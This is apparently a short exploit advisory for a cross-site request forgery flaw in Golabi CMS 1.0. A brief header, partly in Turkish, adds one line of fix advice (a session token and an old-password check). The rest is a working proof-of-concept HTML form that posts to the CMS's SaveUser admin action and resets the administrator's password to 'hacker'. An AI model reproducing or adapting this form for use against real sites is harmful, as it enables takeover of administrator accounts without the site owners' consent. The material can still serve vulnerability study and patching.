< ------------------- header data start ------------------- >

#############################################################

# Application Name : Golabi Cms 1.0

# Vulnerable Type : xsrf

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/system-hacker

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<form action=http://localhost/path/index.php?Module=Admin&submodule=Members&action=SaveUser&id=1 method=post name=usrset >
<td width=50% nowrap>username:</td>
<td width=50%><b>Admin<input name=username type=hidden value=Admin></b></td>
<td width=50% nowrap>Email:</td>
<td width=50%><input type=text name=Email value=[email protected] size=20 maxlength=50></td>
<td width=50% nowrap>password:</td>
<td width=50%><input type=password name=password value=hacker size=20 maxlength=32><small>leave clear for no change.</small></td>
<td width=50% nowrap>User Group:</td>
<td width=50%><select name=Group><option selected value=10>Administrators</option></select></td>
<td width=100%> </td>
<td nowrap><input type=reset name=reset value=Reset><input type=submit name=save value=Save></td>
</form>

< -- bug code end of -- >